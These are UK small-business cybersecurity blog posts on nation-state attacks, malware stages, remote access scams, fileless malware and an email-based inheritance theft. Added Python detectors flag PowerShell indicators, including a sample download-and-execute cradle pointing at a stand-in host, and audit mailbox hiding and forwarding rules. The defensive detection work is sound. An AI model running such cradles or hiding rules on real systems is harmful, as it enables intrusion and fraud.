‘Cyberattacks launched by one nation-state against another, targeting critical infrastructure, government agencies, businesses, and individuals.’

Nation-state cyber-attacks are often distinctive. The techniques employed are advanced, with highly skilled operators developing and deploying bespoke malware. These operations are often phenomenally well-resourced, with money no object, and executed patiently over long periods, often years.


Why are nation-state attacks launched?

There are several reasons why countries engage in cyber warfare, from its use as an extended theatre of war to attempting to exert influence on rivals’ internal affairs.

Military operations

Cyber warfare can act as a further weapon in support of traditional methods, as we’ve seen in the current Russia-Ukraine conflict.

Sabotage

Another motivation is simple disruption, whether to send a message or destabilise an enemy. We’ve seen plenty of attacks on critical infrastructure such as power grids, financial systems, and transportation networks. Perhaps the most famous example of this (although never officially attributed to any one state) is the Stuxnet worm that sabotaged centrifuges at Iran’s uranium enrichment facility and set back its nuclear programme.

Espionage

Espionage is probably the most common goal of nation-state cyber warfare. State-sponsored actors might attempt to steal military intelligence, intellectual property, personal data or other sensitive information from government bodies or their supply chains. Another common use is to spy on journalists, politicians and others in positions of influence.

For a very current example of this, check out the recent exposure of China’s ‘hackers for hire’ programme.

To influence operations 

Spreading misinformation, propaganda, or sowing discord can be used to destabilise a target nation. The most infamous examples of this are perhaps the 2016 US election and the UK’s Brexit referendum, both widely reported to have been targeted by outside influence. And this is likely to become a live issue again as both the UK and US go to the polls in 2024.

Stealing funds

Nation-state attacks aren’t always for political gain. The past few years have seen the rise of nation-state actors simply stealing funds. For example, groups associated with North Korea have stolen an estimated $2 billion (£1.6 billion) from at least 38 countries in the past five years.

Why does this matter to you?

Nation-state cyberattacks are a big deal, even if they don’t target you personally. For those of you who have seen ‘Leave The World Behind’ this film brings home the chilling reality of what a significant cyber attack upon a nation could look like.

What’s more, this isn’t all the work of Hollywood screenwriters. Statistics show that in 2021, 21% of nation-state attacks targeted consumers – ordinary people like you or me. 

The impact of these attacks can be significant too. Imagine no water or electricity because hackers targeted power grids. Or worse still, a hacked nuclear system and the apocalyptic consequences that could entail. 

Interestingly, between 2021 and 2023 we have seen a significant increase in nation-state cyber attacks against education. Between July ’22 and June ’23, the education sector was the most targeted, with 16% of all such attacks directed at it.

The same report highlighted that 11% of attacks were directed at think tanks and non-government organisations – groups that will have some part in shaping elections.

So while you might not be the direct target, the impact can be felt by everyone.

Nation-state attacks in the real world

We mentioned some of these in passing earlier, but let’s dig into some of the most famous examples of nation-state cyber warfare. 

Stuxnet (2010)

We almost always assume that the attacker is going to be from one of a few countries, but this nation-state attack was launched by the US and Israel. The target was an Iranian nuclear plant due to the simmering tensions between the Iranian and US governments over the former’s atomic weapons programme. 

We recommend reading about this in more detail (it’s well-documented and very interesting) but, in summary, malicious software in the form of a worm was used to specifically target Siemens-made equipment used in the nuclear power plant. This caused an estimated 1,000 centrifuges within the plant to fail, temporarily neutralising Iran’s nuclear programme. 

US election (2016)

In 2016 we saw Russian interference in US elections. The Russian government utilised thousands of fake social media profiles that purported to be Americans, spreading disinformation. This attack also targeted American politicians directly, hacking and stealing data from senior members of Hillary Clinton’s campaign committee and leaking this information online.

And one fresh off the press…

In February 2024, globally renowned cloud services provider Cloudflare reported unauthorised access to its internal systems by an unknown attacker.

Although we don’t know anything for certain yet, Cloudflare suspects a nation-state actor was behind the incident. The attack involved stolen credentials being used to gain access to an Atlassian server containing documentation and a limited amount of source code.

Unfortunately, these examples illustrate that the attacks will keep coming, which poses the question: what can you do to protect yourself or your business?

What should I do to protect myself?

Though few of us will be directly subjected to a nation-state attack, it’s feasible that our organisation or someone that we work with could be. 

What can we do as individuals? 

Start by practising good cyber hygiene, like using strong passwords, setting up multi-factor authentication, and being cautious of suspicious emails and links. Alongside this, it’s important to stay informed about emerging threats and best practices for preventing them.

What should businesses do?

Organisations need to implement good cybersecurity practices such as vulnerability management, incident response plans, and employee training. If you’re unsure where to begin, accreditations like Cyber Essentials can give your business a solid grounding in the fundamentals of cybersecurity. 

What should we expect from governments?

Apart from ensuring they have the best possible cyber defences in place, governments must also develop international norms and frameworks to promote responsible state behaviour in cyberspace.

The EU has taken a significant step towards this in agreeing to the European Cybersecurity Scheme on Common Criteria (EUCC). This is the first scheme of three and targets IT products such as hardware, software and components.

We can’t stop nation-state activity and, individually, we can’t significantly influence it. But, we can ensure that we are informed about these threats and influence those closest to us, be that family, friends, the leaders within organisations that we work for or the businesses we buy from.

With AI quickly becoming part of our lives and a general election later this year, security is everyone’s responsibility and we must take this seriously.

Want to know more about the threats facing small businesses? Check out our guide to how SMEs are handling cybersecurity during a cost of living crisis.


Demystifying malware: The 5 stages of a malware attack


Malware is almost as old as the first personal computers. And like anything that’s existed for a long time, it’s easy to become complacent about it. 

However, if your business has ever fallen victim to a malware attack, you’ll know how damaging it can be. The repair costs alone can set you back thousands; then, there’s the indirect financial impact of prolonged business disruption, data loss, and reputational damage.

Yet, it’s not all doom and gloom. Armed with a little understanding, you can prepare your business and stay safe online. To help you do this, we’ve put together this short guide to help you get your head around the stages of a malware attack and how they work.

But first…

What is malware?

Malware is the umbrella term for malicious software that damages, disrupts, or gives cybercriminals access to a computer system.

Cybercriminals typically disguise malware as legitimate files, links, or attachments on a web page or email. The goal is to trick the victim into downloading the malicious program onto their device, where it can:

  • Steal corporate information or sensitive customer data
  • Delete or encrypt data
  • Disrupt business operations

In some cases, malware can exploit vulnerabilities in your cybersecurity to spread to other connected systems in your network.

The most common strains of malware are:

Considering Cyber Essentials but unsure where to start? Our guide is here to help.

There’s no getting away from malware

Malware is a pervasive threat. The AV-TEST Institute registers 450,000 new types of malware every day, contributing to the estimated 1.5 billion malicious software programs and potentially unwanted applications (PUA) in the world today. 

Cybercriminals and threat groups are responsible for billions of malware attacks every year – there were 5.5 billion in 2022 alone. Cybercrime, including malware, costs UK businesses an estimated £21 billion every year.

UK businesses are on the frontlines of the malware threat. 84% of UK Chief Information Security Officers (CISOs) say UK organisations are at the highest risk of material cyberattacks, with ransomware among the most common. For example, 66% of businesses fell victim to one or more ransomware attacks in 2023, marking a 44% increase from 2020.

Meanwhile, public administration experiences more malware attacks than any other sector. Public sector bodies reported 488 separate incidents between November 2021 and October 2022.


The 5 stages of a malware attack

Infected websites, email attachments, and removable media are the most common means of malware attack. But whatever the approach, they all follow a similar five-stage pattern.

Stage 1: Entry

The victim inadvertently visits a compromised website by:

  1. Visiting a trusted website that a cybercriminal has hijacked
  2. Clicking on a link (often embedded in an email) that redirects the victim to the compromised website

Cybercriminals can compromise a trusted website by exploiting vulnerabilities in its servers or content management system (CMS), or by using stolen credentials, to inject malicious code. When the victim visits the compromised web page, the injected code automatically downloads malware onto their system.

Stage 2: Distribution

After bypassing the victim’s cyber defences, the malicious code redirects the victim’s browser to an exploit kit hosting site. Cybercriminals typically use hacked traffic distribution systems (TDS) to create multiple redirections, which help to conceal their activities and the identity of their exploit kit hosting site.

Traffic distribution systems use a combination of traffic filtering and fast-flux networks to hide the host site from search engines and security scans, making them harder to track down and blocklist.

Stage 3: Exploitation

The hosting site installs an exploit kit onto the victim’s system, which loads it with malicious files, including:

  • HTML
  • Java
  • Flash
  • PDF

These files probe the victim’s system, looking for vulnerabilities they can exploit to gain access to or control of the target computer. And the worst part? The technical barriers to entry for launching malware attacks get lower each year. Cybercriminals can create homemade exploit kits or, if they don’t have the coding skills, they can purchase them cheaply on the dark web.

Stage 4: Infection

Having successfully infiltrated the victim’s system, the malware delivers its harmful payload. This could be anything from ransomware to trojan horses or worms that operate silently in the background.

Stage 5: Execution

Now, the malware gets to its dirty work. Depending on the cybercriminal’s goals, this could be stealing or encrypting sensitive data to ransom back to the victim, disrupting business operations, or infiltrating other connected systems.


Malware attack examples

Malware affects everyone. Even global brands and government organisations with robust cybersecurity tools, practices, and policies have fallen prey to malware over the years.

These examples of recent high-profile attacks illustrate the extent of the threat.

LockBit (ransomware)

One of the most active ransomware strains, LockBit has affected over 1,500 businesses at a total cost of over £72 million since emerging in 2019. The Royal Mail is among its most high-profile victims. At the start of 2023, LockBit caused severe disruption to Royal Mail’s overseas delivery service after it affected one of its back-office systems. The attack lasted two months and cost over £10 million to rectify.

Conficker (worm)

One of the largest and most notorious worms in history, Conficker has infected tens of millions of computers in over 190 countries since its discovery in 2008. Its long list of victims includes government agencies (including the UK parliament), businesses, and home computers, and it remains an ongoing threat. To date, it’s caused £7 billion in damages.

Emotet (trojan horse)

First discovered in 2014, the Emotet trojan has wreaked havoc on businesses and government organisations, especially in the United States. According to the Department of Justice, the trojan has infiltrated over 1.6 million computers and caused £2.5 billion in damages.


Prevention is the first step to protection

It’s not always easy to spot a malware attack. Cybercriminals use sophisticated tools and techniques to conceal their activity from victims, so it could be days, weeks, or even months before you realise something’s wrong.

Preparation is the key to protecting your business, suppliers, and customers from malware. At the very least, we recommend regularly updating your systems and software, installing a network firewall, and teaching staff cybersecurity best practices.

If you want to go one step further, consider getting a cybersecurity certification. Schemes like the government-backed Cyber Essentials are quick, easy, affordable, and effective.

Want to know more about how cybersecurity certifications could help protect your business? Check out our guide to cybersecurity certifications in the UK.


What is a remote access takeover?


Wherever you look, fraud is on the rise. According to UK Finance, there were 1.4 million cases of fraud in the first half of 2023, with criminals stealing over £580 million. And worming its way into these figures comes a growing threat – remote access takeovers.

In this blog, we’ll deal with the what and the how of remote access scams, including how to avoid falling foul of them. Read on to find out more.

How does a remote access scam work?

A remote access takeover is a form of identity theft. The principle is a simple one. Usually, the fraudster will pose as a legitimate contact, say a customer service agent from your bank. Like other social engineering attacks, the goal is to use psychology to get the victim to reveal their account details or login credentials.

Once in, the bad guys can seize control of your account and use it for their own nefarious ends. It could be making unauthorised payments from your bank account or using your profile to launch phishing scams.

Typically, a remote access takeover works in one of two ways:

1) The fraudster calls the victim and persuades them, through social engineering techniques, to provide account details and give them access.

2) The cybercriminal coerces their quarry into downloading malware that gives them control of the victim’s device or access to their account(s). 

In common with all cybercrime, these attacks can range from the downright laughable (think the much-mocked ‘distant relative’ scams of the noughties) to the highly sophisticated. 

Did you know that 49% of SME leaders feel more at risk of cyberattack since the beginning of the cost of living crisis? Read our new report to find out why.

How big a problem are remote access takeovers? 

As we mentioned in the introduction, remote access scams are something of a growth industry. Action Fraud – the UK’s national reporting centre for fraud and cybercrime – estimates that £3.8 million has been lost to remote access takeovers since June 2023. 

This fits with the broader trend towards social engineering or ‘human manipulation’ scams in cybercrime. Anti-virus provider Norton estimates that these kinds of scams were responsible for 75% of all threats in the first half of 2023. 

So the problem is real, which begs the question, what can you do to protect your business? 

How can you protect your business?

The good news about remote access scams is that they deploy psychological techniques as old as time. Why is that a good thing? Well, it means that they’re relatively easy to stop. Here’s how.

Don’t give out digital banking details 

This one almost goes without saying, but never give out digital banking usernames, passwords, internet secure banking key codes or one-time passcodes (OTPs) during an unsolicited call. Whoever your business banks with won’t ask for this information over the phone. So, if someone does, it’s a sure sign of a scam. 

Never install any remote access software as a result of a call

Like the previous point, no bank will ever ask you to download a remote access tool so they can access your smartphone or computer. Again, if you’re asked to do this, it’s a good indicator that the person asking isn’t legitimate, so hang up immediately.

Verify telephone numbers

If you do receive a suspicious call, verify the number. There are plenty of free services just a Google away. Or, you could cut out the middleman and cross-reference the number with those listed on the provider’s website.

However, be aware that cybercriminals are getting better at this all the time, so the number may well look very similar.

Just hang up

Unleash the power of your phone’s end-call button. Seriously, if you receive a suspicious call from someone claiming to be your bank, there’s nothing stopping you from simply hanging up.

Cybercriminals rely on creating a sense of urgency. It’s in those vital few seconds before we’ve really thought about the request that they do their worst work. Don’t let them. Hang up, wait a few minutes, then call your bank yourself. If it was a legitimate call they’ll let you know and, if it wasn’t, you’ll have dodged a scam.

Put processes in place

Workplaces can be stressful and mistakes happen. Policies stop the little errors we all make in our day-to-day working lives from growing into something much bigger and uglier. 

Ensure your business has a proper due diligence culture for payments, including two-tier approval. On top of this, make sure everyone is aware of remote access takeover scams, and have an escalation policy in place, which brings us nicely to our final point.

Educate your staff

Education is what ties all of the above points together. Ensure everyone in your business can recognise a suspicious call and is aware of the tactics cybercriminals employ. The simplest way to do this is through cybersecurity training.

What this looks like will depend on your business and its needs. For some businesses, this means starting with the fundamentals. Meanwhile, for others, training addressing specific weak spots in employee knowledge is just the ticket.

Whichever approach suits you, we recommend using a little and often approach. Little, because you want to keep staff engaged rather than overwhelm them. Often, so that thinking about cybersecurity becomes second nature. For more on cybersecurity training and why you need it, read this blog.

Want to know more about the threats faced by small businesses like yours? Check out our guide to SMEs and the cost of living crisis.

What is fileless malware and how can you safeguard your systems?


The most elusive of all malware, fileless malware is a threat you can’t afford to let slip off your radar. It accounts for 40% of global malware, according to research from Arctic Wolf Labs. And attacks increased by an eye-watering 1,400% between 2022 and 2023. 

The next time you’re assessing cybersecurity priorities, keep protecting your business from these furtive attacks front of mind. 

What is fileless malware?

Fileless malware is malicious code that runs from your RAM or through legitimate system tools rather than being written to your disk (SSD or hard drive). Essentially, it uses your system’s software, applications, or protocols to launch an attack. Technically, it’s not actually fileless, but the name comes from where the code is stored and the fact it uses what already exists in the system. 

The hacker uses the malicious code to gain access to your systems, executes it by piggybacking on legitimate scripts, and then steals credentials, encrypts files and so on – whatever they set out to do as part of the attack. 

Because the code is stored in memory, it generally disappears when you reboot your system (unless the hacker uses more advanced tactics to make the malware persist across restarts). This makes the malware incredibly difficult to spot, meaning security teams and antivirus software may not notice it or find out what caused the problem.

Want to know more about the threats facing small businesses like yours? Check out our latest report on SMEs and the cost of living crisis.

Some fileless malware techniques

Living off the land binaries (aka LoLBins)

LoLBins primarily refer to pre-installed Windows binary tools used for default system operations. PowerShell, a Windows scripting language, is an example of this. However, hackers can take advantage of them to launch attacks and avoid detection. 

Memory code injection

A memory code injection inserts malicious code into the memory of a process that is already running on the computer, so the code executes without ever being saved as a file. 

Fileless malware examples

Operation Cobalt Kitty

OceanLotus Group, who also go by APT32, targeted an international company based in Asia. The long-term attack compromised more than 40 computers and multiple servers. 

They used the Windows PowerShell configuration management tool as an entry point for malicious code. It manipulated network management services so it would stay on systems rather than being deleted on start-up. The group managed to penetrate the organisation via spear-phishing emails to senior employees that encouraged them to click on malicious links or download weaponised documents.

FritzFrog

FritzFrog is a fileless and serverless peer-to-peer botnet and worm that uses brute force to access secure shell (SSH) servers.

In January 2020, the cybercriminals behind it launched an attack that lasted for eight months, affecting 24,000 SSH servers from government, education, healthcare, and private enterprises.

Once the malware had successfully compromised a server, it would replicate and spawn threads to achieve different goals, e.g. one would use brute force to access more targets while another deployed the payload. It did this so it could run a miner for the Monero cryptocurrency on the compromised server.

Code Red 

Identified as the first-ever fileless attack, Code Red spread worldwide in 2001 and affected more than 300,000 servers.

The worm exploited a vulnerability in Microsoft’s IIS web server software, affecting Windows NT and Windows 2000 systems running it. It caused websites hosted on the web server to display incorrectly.

According to a Sophos threat researcher, Microsoft released a patch to protect against the vulnerability just a month before the attack, showcasing the importance of updating software as soon as patches are available. 

How to protect your business

Fileless malware is particularly tricky to detect because it’s written into memory or trusted, legitimate code. That means standard antivirus software doesn’t always detect a problem. And, in cases where the code is written to memory and wiped on restart, there’s no trace of the malicious code to work from. 

However, there are some steps you can take to look after your cyber hygiene and give your business the best defence against malware in general, including fileless malware. 

Patch your systems

Just like Code Red, unpatched vulnerabilities in operating systems, browsers, and software are a breeding ground for cyber threats. To counter this, install patches and security updates as soon as they’re available to give your business the best protection. 

Continuous logging and monitoring 

It’s important to stay on top of any security incidents so you have a full understanding of your IT infrastructure. It’s also important to monitor your systems for any unusual activity so you can respond to potential threats quickly and limit the damage. This can be difficult to do in-house unless you’re a very big business with lots of cybersecurity experience, but there are many options for third parties to monitor your security for 24/7 protection.
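The kind of monitoring this section recommends can be made concrete with a small detection routine. What follows is an added example, not code from the original post or from any product it mentions: it takes PowerShell script-block log entries (constructed sample records, in the shape a log collector would extract from Windows Event ID 4104) and flags the living-off-the-land indicators described under the fileless malware techniques above, such as an encoded or hidden-window command and an in-memory download-and-execute pattern. The indicator list, host names and user names are assumptions made for the illustration.

```python
"""Flag PowerShell script-block log entries that show living-off-the-land
or fileless-malware indicators. Added example: the events are constructed
samples and the indicator patterns are assumptions, not a vendor rule set."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample records in the shape a log collector would extract from
# Windows "PowerShell Script Block Logging" events (Event ID 4104).
SAMPLE_EVENTS = [
    {"host": "FIN-PC-01", "user": "alice",
     "script": "Get-ChildItem C:\\Reports | Sort-Object LastWriteTime"},
    {"host": "FIN-PC-01", "user": "alice",
     "script": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
               + base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()},
    {"host": "HR-PC-07", "user": "bob",
     "script": "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"host": "DC-01", "user": "svc_backup",
     "script": "Get-Service | Where-Object Status -eq 'Running'"},
]

# Indicators (assumed heuristics): each is a pattern commonly seen when a
# LoLBin is abused to run code from memory instead of from a file on disk.
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
INDICATORS = {
    "encoded_command": ENCODED_ARG,
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I),
    "inline_eval": re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly", re.I),
}


@dataclass
class Finding:
    host: str
    user: str
    indicators: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def decode_encoded_command(script: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; decode it for inspection."""
    m = ENCODED_ARG.search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event: dict) -> Finding:
    """Return the indicators that fire on one event, scanning any decoded payload too."""
    script = event["script"]
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    decoded = decode_encoded_command(script)
    if decoded:
        # The encoded payload is where the real behaviour hides; scan it as well.
        hits += ["decoded:" + name for name, rx in INDICATORS.items()
                 if name != "encoded_command" and rx.search(decoded)]
    return Finding(event["host"], event["user"], hits, decoded)


def suspicious_events(events, min_indicators: int = 1) -> List[Finding]:
    """Findings for events with at least min_indicators hits."""
    return [f for f in map(analyse_event, events) if len(f.indicators) >= min_indicators]


if __name__ == "__main__":
    for f in suspicious_events(SAMPLE_EVENTS):
        print(f"{f.host} ({f.user}): {', '.join(f.indicators)}")
        if f.decoded:
            print("  decoded:", f.decoded)
```

Script-block logging has to be switched on first (it is off by default), and the routine only helps if those logs are collected somewhere the attacker cannot wipe. Treat the hits as triage leads rather than verdicts: some deployment and management tooling legitimately uses encoded commands, which is why the example decodes the payload and scans it again before anyone escalates.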

Education

To avoid threats, your people need to understand them. And the same is true for fileless malware. So, make cybersecurity training regular, bitesize, and as fun as possible. It’s not about fearmongering, it’s about arming your teams with knowledge. 

Endpoint protection

An endpoint is a device that connects to and exchanges information with a computer network. Endpoint protection includes measures such as device encryption, perimeter security on cloud storage, network access control, anti-malware, and more. 

Get Cyber Essentials certified

Cyber Essentials is a government-backed scheme with a simple framework based on five technical controls. Many of these controls include actions that overlap with our other tips in this section, so you can tick more off your to-do list in one go. 

  1. Secure configuration
  2. Malware protection
  3. Network firewalls
  4. User access controls
  5. Security update management

It’s a great starting point for businesses looking to improve their cybersecurity credentials before moving on to more complex and costly certifications like ISO 27001. And, if you’re unsure which option is best for you, start by reading our free guide to certifications in the UK.

The fight against fileless malware

Hopefully, these tips help you to feel more confident about protecting your business against fileless malware. 

However, as with all threats, fileless malware is ever-evolving. One way to ensure you stay cyber confident is to keep updated with information on new threats. Our report on SMEs and the cost of living crisis tells you everything you need to know about how small businesses are tackling cybersecurity during an economic downturn. Read it here.


Why small businesses are at greater risk of malware attacks


Malware attacks are a well-known concern for businesses, but what type of business is more at risk?

Small businesses are just as at risk as large enterprises. In fact, 54% of SMEs reported experiencing between one and five cyberattacks in a 12-month period. 

Let’s explore why. 

Small businesses and malware attacks

Small and medium-sized businesses (SMEs) are less likely to have robust protocols in place to mitigate a malware attack. They might not be aware of the risks, understand what a malware attack looks like, or have the ability to react if one occurs.

And cybercriminals take advantage of unprepared businesses. 43% of cyberattacks target SMEs. Their entry points might not be as closely guarded as a larger company’s, and employees might not know what to do if an attack occurs – or even be able to identify it in the first place. Most notably, 75% of SMBs could not continue operating if they were hit with ransomware.

The cost of living crisis has hit small businesses particularly hard. But what does this mean for SMEs’ cybersecurity? Find out in our latest report. 

The types of malware attack

Every malware attack will look slightly different, making them hard to identify. To help you stay aware, let’s take a look at the most common types. 

  • Ransomware works by grabbing your attention. It disables your company’s data using encryption until a financial ransom is paid.
  • Spyware collects information from targets without their knowledge. It’s unknowingly downloaded and installed onto your devices.
  • Adware displays intrusive advertisements that reappear when closed. It’s usually delivered as a high number of pop-ups that disrupt your systems.
  • Trojan malware is disguised as something it’s not. Users unknowingly download it, believing it to be legitimate software. 
  • Mobile malware works by installing itself onto your mobile devices. This can be an issue if you use a mobile to access sensitive business data.
  • Bots perform automated tasks on demand. When they make their way onto your system, they run malicious tasks automatically. 
  • Worms access your systems through unintentional software vulnerabilities. This is why it’s important to keep systems up to date. 
  • Keyloggers monitor keystrokes on infected devices to collect sensitive information, like passwords. 
  • Fileless malware hijacks software and tools you already use. 

A stage-by-stage breakdown of a malware attack

Every malware attack is different, but some of them follow a similar pattern. Learning how to spot a malware attack is key to preventing one before it’s too late.

Here’s a breakdown of what you can expect.

1. Gathering information

A cybercriminal is unlikely to target a business that they know has tough defences. So they’ll start the process by gathering information on your business. 

They’ll identify the systems or software that you use and any potential vulnerabilities. If they find some, then your business is more likely to be a target. 

2. Targeting

The cybercriminal will make their choice of malware to target you with. 

They’ll conduct their activities to begin infiltrating your organisation. For example, they might start sending phishing emails with malware attached. This will depend on the type of malware they choose. Be aware that malware can be incredibly sophisticated, so this type of attack can come from a device, email, software, or any channel in your business.

3. Delivery

The attacker will spread the malware to your business. This could be across your systems and software, or directly to employees. Hackers only need a single vulnerability to get in, so will exploit as many entry points as possible. 

4. Exploitation

This is when the malware is triggered. It establishes a foothold on your systems by exploiting the vulnerabilities it has found. Malware can also begin to replicate itself, alter your systems, and even autonomously update the cybercriminal on its progress.

The malware will begin to disrupt your systems, software, and people. It can also steal sensitive information. 

How can your small business avoid malware attacks?

SMEs are inherently more at risk as they’re less likely to have robust cybersecurity measures in place. However, it doesn’t have to stay that way.

You can mitigate the risk of a cybercriminal choosing your business by:

  • Improving employee training
  • Implementing data encryption
  • Using firewalls
  • Managing user access
  • Updating software and operating systems
  • Obtaining a cybersecurity certification

If you’re wondering how you can achieve all these steps fast, then a cybersecurity certification is the answer. It requires your business to comply with a strict set of cybersecurity measures to qualify. Therefore, it’s an easy way to make sure you’re following best practices. 

It incorporates every step, from employee training to regulating firewalls, so that no cybersecurity measure is overlooked. So when malicious cybercriminals find your business, you’re less likely to be a target. 

Want to know more about the threats facing small businesses and how they’re dealing with them? Check out our research on SMEs and the cost of living crisis. 


Lessons from a breached email and inheritance theft


We all spend almost every day plugged into our emails. For most of us, this is our primary source of communication with the rest of the world – whether for work or our personal lives.

However, despite its utility, email communications can have a darker side. This blog will help answer what threats exist, why email security matters, and, most importantly, what can be done to defend against these threats. Plus, we will look at a real-life case in which email was used to steal hundreds of thousands of pounds.

What vulnerabilities could exist in my email security?

So, what vulnerabilities could exist when using your email? The first and greatest threat is phishing. I won’t discuss this further as there is already lots of good information available about phishing, including this blog post.

Phishing also has a close cousin. We’ve all received an email at some point from what appears, on first look, to be a legitimate sender. For instance, you might receive an email from an address at ‘arnazon.com’ asking you to update your card details. It looks legitimate if you just glance at it (which is what cybercriminals are banking on) but leads to a fake corporate website which cybercriminals will use to steal your financial information. This is known as ‘spoofing’. 

Another vulnerability, which extends beyond email, is weak authentication. In layman’s terms, this is having a poor password: one that is either short or easily guessable, such as a piece of personal information, for example your pet’s name or your birth date. 

This information can be used to launch further threats, such as man-in-the-middle attacks. This involves intercepting and potentially altering email communication between two parties to deceive or scam one or both parties.

Of course, these are only a few of the many vulnerabilities that exist, but they give us an idea of what is out there.

Did you know that 49% of SME leaders feel more at risk of cyberattack since the beginning of the cost of living crisis? Read our new report to find out why.

What are the possible impacts of these vulnerabilities?

It’s easy to assume that email security is not your greatest concern. Why would anyone want to attack you? Well, there are many reasons. Whether you use a personal email or a work email, these are some of the possible impacts you could experience:

Identity Theft

Identity theft can lead to financial losses for you or your business, reputational damage and even legal issues.

Malware Infections

A successful malware attack could lead to the loss of important proprietary or customer data. This could prevent your business from being able to operate.

Data Breach

Sensitive information could be stolen and used against you. This could be intellectual property, the loss of which could disadvantage your business. It could also see your business breach regulations, face legal consequences and receive fines.

The breached email and inheritance theft

Whilst working as a cybercrime detective in the police, I dealt with many cases that involved email as the attack method.

One such case involved a solicitor. As you can imagine, security is a top priority considering the sensitive data solicitors process. And, this solicitor had done almost everything right. They had a business-owned domain and an IT team to look after it and ensure security. 

The firm’s security measures included IP whitelisting (which will be key in a minute). ‘Whitelisting’ is a security strategy that prevents users from logging into internal company platforms from anywhere other than ‘trusted locations’. For example, a ‘trusted location’ could be your head office or coworking space. In this case, there was only one trusted location, the solicitors’ office. 

What went wrong? 

Due to the pressures of the job, one solicitor in the firm decided to work outside the office in the evenings and at weekends. Because the firm’s systems could not be reached from outside the office, they created a new email account using the firm’s name, outside the firm’s domain and therefore outside the controls the IT team had put in place.

Here’s where things go wrong.

Unfortunately, this account was discovered by a cybercriminal, and a weak password gave them access to the inbox. The cybercriminal noticed one conversation that piqued their interest. The solicitor was dealing with an inheritance case and was working with the deceased’s family to distribute assets and money from the deceased’s will.

The cybercriminals hijacked this conversation. They added a mailbox rule that automatically moved any replies from the family into a concealed folder. This prevented the solicitor from seeing them and allowed the criminals to alter the messages before dropping them back into the solicitor’s inbox.

The cybercriminals intercepted an email from one of the family members containing a document which detailed the bank account the inheritance money was supposed to be transferred to. Seeing this, the bad guys pounced, changing the bank details to their own.

The solicitor logged this information and continued with the formalities. A few days later, the money was transferred and the cybercriminals found themselves hundreds of thousands of pounds richer.
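The hiding rule is the detectable part of this attack: it is created inside the victim’s mailbox, so it can be audited. The following Python script is an added example, not part of the original article, that scores exported mailbox rules for the pattern described above: mail diverted to a rarely-read folder or an external address, marked as read or deleted, keyed on payment-related words, under an inconspicuous name. The rule layout, folder list, firm domain and sample rules are all constructed assumptions rather than any mail provider’s real export format.

```python
"""Audit mailbox rules for the reply-hiding pattern used in the inheritance case.

Added example, not from the original article. The rule structure below is an
assumed, simplified export format, not any specific mail provider's schema.
"""
from __future__ import annotations

from dataclasses import dataclass, field

# Folders attackers park diverted mail in because nobody looks there (assumed list)
HIDING_FOLDERS = {"rss subscriptions", "rss feeds", "conversation history",
                  "junk email", "deleted items", "archive"}
# Words that suggest a rule is aimed at payment conversations (assumed list)
FINANCIAL_TERMS = {"invoice", "payment", "bank", "transfer", "inheritance",
                   "account", "remittance", "wire"}
INTERNAL_DOMAIN = "example-firm.co.uk"   # hypothetical firm domain


@dataclass
class InboxRule:
    name: str
    # conditions, e.g. {"subject_contains": [...], "body_contains": [...], "from_contains": [...]}
    conditions: dict = field(default_factory=dict)
    # actions, e.g. {"move_to_folder": str, "forward_to": [addr, ...], "mark_as_read": bool, "delete": bool}
    actions: dict = field(default_factory=dict)
    enabled: bool = True


def audit_rule(rule: InboxRule, internal_domain: str = INTERNAL_DOMAIN) -> list[str]:
    """Return human-readable findings for one rule; an empty list means nothing suspicious."""
    findings: list[str] = []
    if not rule.enabled:
        return findings
    act = rule.actions
    folder = (act.get("move_to_folder") or "").strip().lower()
    diverted = False  # does the rule take mail out of the owner's sight?

    if folder in HIDING_FOLDERS:
        findings.append(f"moves mail to rarely-read folder '{act['move_to_folder']}'")
        diverted = True
    for addr in act.get("forward_to", []):
        if addr.rsplit("@", 1)[-1].lower() != internal_domain:
            findings.append(f"forwards mail to external address {addr}")
            diverted = True
    if act.get("delete"):
        findings.append("deletes matching messages")
        diverted = True
    if act.get("mark_as_read") and diverted:
        findings.append("marks diverted messages as read so no unread count betrays them")

    terms = [t.lower() for t in rule.conditions.get("subject_contains", [])
             + rule.conditions.get("body_contains", [])]
    hits = sorted({f for f in FINANCIAL_TERMS for t in terms if f in t})
    if hits and diverted:
        findings.append(f"targets payment-related keywords {hits}")
    if len(rule.name.strip()) <= 1:
        findings.append("rule has a blank or single-character name, a common way to avoid notice")
    return findings


def audit_rules(rules: list[InboxRule]) -> dict[str, list[str]]:
    """Map each suspicious rule's name to its findings; clean rules are omitted."""
    report = {}
    for rule in rules:
        findings = audit_rule(rule)
        if findings:
            report[rule.name] = findings
    return report


# Constructed sample export: one benign rule and two shaped like the case above
SAMPLE_RULES = [
    InboxRule("Newsletters", {"subject_contains": ["newsletter"]},
              {"move_to_folder": "Newsletters"}),
    InboxRule(".", {"from_contains": ["@family.example"],
                    "subject_contains": ["Re: Inheritance", "bank details"]},
              {"move_to_folder": "RSS Subscriptions", "mark_as_read": True}),
    InboxRule("Backup", {"body_contains": ["transfer"]},
              {"forward_to": ["drop@webmail.example"], "delete": True}),
]

if __name__ == "__main__":
    for name, findings in audit_rules(SAMPLE_RULES).items():
        print(f"rule {name!r}:")
        for f in findings:
            print(f"  - {f}")
```

Run against a real export, the benign ‘Newsletters’ rule produces no findings, while the ‘.’ rule that hides inheritance replies and the ‘Backup’ rule that forwards and deletes are both reported. Any rule created in the last few days that scores here is worth a phone call to the mailbox owner.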

How to protect yourself when using email

So, what can you do to protect yourself? 

The good news is, by reading this blog you’ve taken the first step by improving your awareness. Understanding what types of threats exist and being alive to this ever-present danger will ensure that you start from the best possible place.

